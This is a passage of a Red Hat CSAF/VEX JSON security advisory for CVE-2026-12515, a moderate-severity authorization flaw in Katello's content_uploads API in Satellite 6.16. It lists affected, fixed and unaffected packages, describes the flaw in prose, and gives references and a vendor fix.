"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2489812"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Katello\u0027s of Red Hat Satellite. A content upload functionality where insufficient authorization checks in the ContentUploadsController allowed users with the edit_products permission to query content information for repositories outside the products they were authorized to manage. An authenticated attacker could exploit this issue to determine whether specific content exists within repositories that should otherwise be inaccessible. This issue does not allow unauthorized modification, import, or publication of content.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "katello: missing repository authorization in content_uploads exposes cross-product content existence",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability affects Katello\u0027s content upload API authorization handling. Red Hat Product Security has assessed this issue as a Moderate severity vulnerability.\n\nKatello\u0027s content_uploads API does not properly enforce repository authorization checks when processing upload requests. A user with product-filtered edit_products permissions may query repositories outside their authorized scope and determine whether matching content exists within the Pulp content store.\n\nThe issue arises because the API allows operations against repositories that are not covered by the caller\u0027s product-scoped permissions. The response behavior may disclose whether matching content already exists, potentially revealing information about content associated with repositories that would otherwise be inaccessible to the user.\n\nBecause the impact is limited to disclosure of repository information, Red Hat assessed the Confidentiality impact as Low (C:L), with no demonstrated Integrity or Availability impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-12515"
},
{
"category": "external",
"summary": "RHBZ#2489812",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489812"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-12515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-12515"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-12515",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12515"
},
{
"category": "external",
"summary": "https://github.com/Katello/katello/pull/11712",
"url": "https://github.com/Katello/katello/pull/11712"
}
],
"release_date": "2026-06-17T15:27:46.078000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Red Hat is not aware of a practical temporary workaround that fully mitigates this issue or meets Red Hat Product Security\u0027s standards for usability, deployment, applicability, or stability. Customers are advised to apply the relevant security updates if they become available.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
